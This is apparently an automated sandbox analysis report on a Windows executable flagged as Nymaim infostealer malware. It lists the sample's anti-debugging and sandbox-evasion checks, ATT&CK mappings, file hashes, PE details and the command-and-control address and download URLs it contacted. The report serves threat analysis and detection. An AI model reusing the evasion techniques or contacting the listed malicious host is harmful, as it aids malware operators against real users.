                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D26 second address: 49E0D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7174CEBA90h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D56 second address: 49E0D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473B29 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473A34 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 622EC8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473AF9 rdtsc 0_2_00473AF9
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 994Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 949Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 866Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.2 %
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 162 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 184 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 177 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6676Thread sleep count: 994 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6676Thread sleep time: -1988994s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6656Thread sleep count: 949 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6656Thread sleep time: -1898949s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 183 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 227 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 69 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6620Thread sleep count: 78 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6660Thread sleep count: 866 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6660Thread sleep time: -1732866s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: file.exe, file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4100010455.0000000000CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                Source: file.exe, 00000000.00000002.4105195935.0000000005270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473AF9 rdtsc 0_2_00473AF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A7D41 push dword ptr fs:[00000030h]0_2_047A7D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h]0_2_04950D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495092B mov eax, dword ptr fs:[00000030h]0_2_0495092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04959C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A987 SetUnhandledExceptionFilter,0_2_0495A987
                Source: file.exe, file.exe, 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: XtProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		341
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager341
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials213
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe37%ReversingLabsWin32.Infostealer.Tinba
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL100%Avira URL Cloudmalware
                http://185.156.72.65/K0%Avira URL Cloudsafe
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubLfile.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosublfile.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.72.65/Kfile.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.156.72.65
                    		unknownRussian Federation
                    		44636ITDELUXE-ASRUtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565680
                    Start date and time:2024-11-30 14:36:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:37:25API Interceptor11535948x Sleep call for process: file.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.156.72.65file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, NymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65/soft/download
                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                    • 185.156.72.65/files/download

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, NymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65
                    file.exeGet hashmaliciousNymaimBrowse
                    • 185.156.72.65

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947016563329295
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:2'024'448 bytes
                    MD5:d2a93d9f269cbd3b444400d586999e01
                    SHA1:3d9df1a3c04f61e2ed1f89a0fc42021dd120546b
                    SHA256:f4c52e24f469d177317286ffccf86673a2ab2fb4164a47fd1898151b85a13e05
                    SHA512:d18b087882522a0a2641e0f6feb319715daca688bf60e8160b617d34b82738cd916e02634a8c678a81df83e8f039e078e1bccd6bcc3f1f06e64ed42778c067c1
                    SSDEEP:49152:CuM5YAYiAa4YgaAYhDmSZ8MMaFFIM9MyGO3YhpTW:dMkiAfYg6hDmA7sbyGI0
                    TLSH:6F9533B462F5031CC39808B24A3319E7C8C7E99778E932E91798F1ED7569E02757F48A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                    File Icon

                    Icon Hash:cfa99b8a8651798d

                    Static PE Info

                    General

                    Entrypoint:0x8bf000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F71750256EAh
                    cmpps xmm3, dqword ptr [esi], 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007F71750276E5h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4ba8e00x18encvjseq
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x650000x3ae002d4341348ef45cb36004d531ca175f06False0.9955546709129511data7.944720387530333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x660000x82340x3c00fed55bb4f76ce9345551cca262146a13False0.926171875data7.709757848946499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x700000x2a20000x200b9d9b0a3c1dc3c241be7997b0c525e86unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    encvjseq0x3120000x1ac0000x1abe001894cda96a39a1f65f92f7db14f68b34False0.9922970530236634data7.950828634969012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    schszwjt0x4be0000x10000x60035f75e21ea409b715b777220ec3bcaefFalse0.5338541666666666data4.794870245401132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4bf0000x30000x22008081bf8c406bff125b1ad2ba7dc96c7bFalse0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x664600xea8data1.0029317697228144
                    RT_CURSOR0x673080x8a8data1.0049638989169676
                    RT_CURSOR0x67bb00x568data1.0079479768786128
                    RT_CURSOR0x681180xea8OpenPGP Public Key1.0029317697228144
                    RT_CURSOR0x68fc00x8a8data1.0049638989169676
                    RT_CURSOR0x698680x568data0.5173913043478261
                    RT_ICON0x4ba9400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                    RT_ICON0x4ba9400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                    RT_ICON0x4bb0080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                    RT_ICON0x4bb0080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                    RT_ICON0x4bd5b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                    RT_ICON0x4bd5b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                    RT_STRING0x6cea80x252emptyTamilIndia0
                    RT_STRING0x6cea80x252emptyTamilSri Lanka0
                    RT_STRING0x6d0fc0x396emptyTamilIndia0
                    RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                    RT_STRING0x6d4940x520emptyTamilIndia0
                    RT_STRING0x6d4940x520emptyTamilSri Lanka0
                    RT_STRING0x6d9b40x3eeemptyTamilIndia0
                    RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                    RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                    RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                    RT_GROUP_CURSOR0x6ddfc0x30empty0
                    RT_GROUP_CURSOR0x6de2c0x30empty0
                    RT_GROUP_ICON0x4bda180x30dataTamilIndia0.9375
                    RT_GROUP_ICON0x4bda180x30dataTamilSri Lanka0.9375
                    RT_VERSION0x4bda480x254data0.5436241610738255
                    RT_MANIFEST0x4bdc9c0x152ASCII text, with CRLF line terminators0.6479289940828402

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    TamilIndia
                    TamilSri Lanka

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 30, 2024 14:36:58.597740889 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 14:36:58.718518019 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 14:36:58.718755007 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 14:36:58.718892097 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 14:36:58.839010000 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:20.649779081 CET8049730185.156.72.65192.168.2.4
